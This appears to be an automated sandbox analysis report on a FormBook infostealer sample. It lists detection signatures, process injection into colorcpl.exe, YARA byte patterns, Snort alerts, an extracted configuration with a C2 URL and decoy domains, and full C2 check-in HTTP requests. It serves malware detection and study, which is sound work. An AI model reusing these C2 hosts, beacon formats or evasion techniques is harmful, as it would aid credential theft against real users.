Create Interactive Tour

Analysis Report Nz7NA3F7z7.exe

Overview

General Information

Sample Name:Nz7NA3F7z7.exe
Analysis ID:361772
MD5:059a1308ebdfae6ee52fd646d341aeac
SHA1:4bea37c03b3e0ad1ccdea6675819f363c881bf39
SHA256:ff9b0f1788f165edd1e2811c182a990a352a12453706f85d90eaac2601597862
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • Nz7NA3F7z7.exe (PID: 6132 cmdline: 'C:\Users\user\Desktop\Nz7NA3F7z7.exe' MD5: 059A1308EBDFAE6EE52FD646D341AEAC)
    • Nz7NA3F7z7.exe (PID: 3096 cmdline: 'C:\Users\user\Desktop\Nz7NA3F7z7.exe' MD5: 059A1308EBDFAE6EE52FD646D341AEAC)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 6104 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 852 cmdline: /c del 'C:\Users\user\Desktop\Nz7NA3F7z7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{
  "C2 list": [
    "www.856380692.xyz/nsag/"
  ],
  "decoy": [
    "usopencoverage.com",
    "5bo5j.com",
    "deliveryourvote.com",
    "bestbuycarpethd.com",
    "worldsourcecloud.com",
    "glowtheblog.com",
    "translations.tools",
    "ithacapella.com",
    "machinerysubway.com",
    "aashlokhospitals.com",
    "athara-kiano.com",
    "anabittencourt.com",
    "hakimkhawatmi.com",
    "fashionwatchesstore.com",
    "krishnagiri.info",
    "tencenttexts.com",
    "kodairo.com",
    "ouitum.club",
    "robertbeauford.net",
    "polling.asia",
    "evoslancete.com",
    "4676sabalkey.com",
    "chechadskeitaro.com",
    "babyhopeful.com",
    "11376.xyz",
    "oryanomer.com",
    "jyxxfy.com",
    "scanourworld.com",
    "thevistadrinksco.com",
    "meow-cafe.com",
    "xfixpros.com",
    "botaniquecouture.com",
    "bkhlep.xyz",
    "mauriciozarate.com",
    "icepolo.com",
    "siyezim.com",
    "myfeezinc.com",
    "nooshone.com",
    "wholesalerbargains.com",
    "winabeel.com",
    "frankfrango.com",
    "patientsbooking.info",
    "ineedahealer.com",
    "thefamilyorchard.net",
    "clericallyco.com",
    "overseaexpert.com",
    "bukaino.net",
    "womens-secrets.love",
    "skinjunkie.site",
    "dccheavydutydiv.net",
    "explorerthecity.com",
    "droneserviceshouston.com",
    "creationsbyjamie.com",
    "profirma-nachfolge.com",
    "oasisbracelet.com",
    "maurobenetti.com",
    "mecs.club",
    "mistressofherdivinity.com",
    "vooronsland.com",
    "navia.world",
    "commagx4.info",
    "caresring.com",
    "yourstrivingforexcellence.com",
    "alpinevalleytimeshares.com"
  ]
}
SourceRuleDescriptionAuthorStrings
00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries
      SourceRuleDescriptionAuthorStrings
      1.1.Nz7NA3F7z7.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.Nz7NA3F7z7.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.Nz7NA3F7z7.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        1.2.Nz7NA3F7z7.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.Nz7NA3F7z7.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configuration
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.856380692.xyz/nsag/"], "decoy": ["usopencoverage.com", "5bo5j.com", "deliveryourvote.com", "bestbuycarpethd.com", "worldsourcecloud.com", "glowtheblog.com", "translations.tools", "ithacapella.com", "machinerysubway.com", "aashlokhospitals.com", "athara-kiano.com", "anabittencourt.com", "hakimkhawatmi.com", "fashionwatchesstore.com", "krishnagiri.info", "tencenttexts.com", "kodairo.com", "ouitum.club", "robertbeauford.net", "polling.asia", "evoslancete.com", "4676sabalkey.com", "chechadskeitaro.com", "babyhopeful.com", "11376.xyz", "oryanomer.com", "jyxxfy.com", "scanourworld.com", "thevistadrinksco.com", "meow-cafe.com", "xfixpros.com", "botaniquecouture.com", "bkhlep.xyz", "mauriciozarate.com", "icepolo.com", "siyezim.com", "myfeezinc.com", "nooshone.com", "wholesalerbargains.com", "winabeel.com", "frankfrango.com", "patientsbooking.info", "ineedahealer.com", "thefamilyorchard.net", "clericallyco.com", "overseaexpert.com", "bukaino.net", "womens-secrets.love", "skinjunkie.site", "dccheavydutydiv.net", "explorerthecity.com", "droneserviceshouston.com", "creationsbyjamie.com", "profirma-nachfolge.com", "oasisbracelet.com", "maurobenetti.com", "mecs.club", "mistressofherdivinity.com", "vooronsland.com", "navia.world", "commagx4.info", "caresring.com", "yourstrivingforexcellence.com", "alpinevalleytimeshares.com"]}
          Yara detected FormBook
          Source: Yara matchFile source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dllJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: Nz7NA3F7z7.exeJoe Sandbox ML: detected
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.colorcpl.exe.5427960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.colorcpl.exe.11225c8.1.unpackAvira: Label: TR/Patched.Ren.Gen

          Compliance:

          barindex
          Uses 32bit PE files
          Source: Nz7NA3F7z7.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Binary contains paths to debug symbols
          Source: Binary string: colorcpl.pdbGCTL source: Nz7NA3F7z7.exe, 00000001.00000002.275552180.0000000000670000.00000040.00000001.sdmp
          Source: Binary string: colorcpl.pdb source: Nz7NA3F7z7.exe, 00000001.00000002.275552180.0000000000670000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Nz7NA3F7z7.exe, 00000000.00000003.217088763.0000000002980000.00000004.00000001.sdmp, Nz7NA3F7z7.exe, 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, colorcpl.exe, 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Nz7NA3F7z7.exe, colorcpl.exe
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 4x nop then pop esi1_2_00415843
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 4x nop then pop ebx1_2_00406A95
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 4x nop then pop edi1_2_004162BB
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 4x nop then pop edi1_2_00415675
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 4x nop then pop esi1_1_00415843
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop esi7_2_00DA5843
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop ebx7_2_00D96A95
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi7_2_00DA62BB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi7_2_00DA5675

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 91.195.240.94:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.856380692.xyz/nsag/
          Source: global trafficHTTP traffic detected: GET /nsag/?Ntfttf=nlvt&Bd68427=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4EBz+9KVsHtfB HTTP/1.1Host: www.worldsourcecloud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?Ntfttf=nlvt&Bd68427=1KNBKkR/3sxsfy5Hm2m4k9rliP52H6WM2eUoblDVMc3evr5lbTgPZczIDguYEb443quL HTTP/1.1Host: www.tencenttexts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?Bd68427=HzZPNJQ+T/L7/MBs4vfaT6k2sBckkYigm/Q2Kch6th6kZXuKq++LfRIjkyQoyiPFVyMQ&Ntfttf=nlvt HTTP/1.1Host: www.glowtheblog.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?Ntfttf=nlvt&Bd68427=AXehkXJ24fX3Q+umAOPXC/XvfFX0gl1EYu2dc8RW2os5zkvGOL3BkU/yF/W58Bsr/nBR HTTP/1.1Host: www.myfeezinc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?Ntfttf=nlvt&Bd68427=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU7K33DVUY0dk HTTP/1.1Host: www.wholesalerbargains.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.88.34.80 103.88.34.80
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CHINATELECOM-ZHEJIANG-NINGBO-IDCNINGBOZHEJIANGProvince CHINATELECOM-ZHEJIANG-NINGBO-IDCNINGBOZHEJIANGProvince
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: global trafficHTTP traffic detected: GET /nsag/?Ntfttf=nlvt&Bd68427=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4EBz+9KVsHtfB HTTP/1.1Host: www.worldsourcecloud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?Ntfttf=nlvt&Bd68427=1KNBKkR/3sxsfy5Hm2m4k9rliP52H6WM2eUoblDVMc3evr5lbTgPZczIDguYEb443quL HTTP/1.1Host: www.tencenttexts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?Bd68427=HzZPNJQ+T/L7/MBs4vfaT6k2sBckkYigm/Q2Kch6th6kZXuKq++LfRIjkyQoyiPFVyMQ&Ntfttf=nlvt HTTP/1.1Host: www.glowtheblog.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?Ntfttf=nlvt&Bd68427=AXehkXJ24fX3Q+umAOPXC/XvfFX0gl1EYu2dc8RW2os5zkvGOL3BkU/yF/W58Bsr/nBR HTTP/1.1Host: www.myfeezinc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?Ntfttf=nlvt&Bd68427=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU7K33DVUY0dk HTTP/1.1Host: www.wholesalerbargains.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.worldsourcecloud.com
          Source: explorer.exe, 00000003.00000000.247150647.000000000F540000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Nz7NA3F7z7.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Nz7NA3F7z7.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.240816482.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: colorcpl.exe, 00000007.00000002.488303351.00000000055A2000.00000004.00000001.sdmpString found in binary or memory: https://www.123-reg-new-domain.co.uk/iframe.html
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FF1
          Source: Nz7NA3F7z7.exe, 00000000.00000002.222814834.000000000077A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
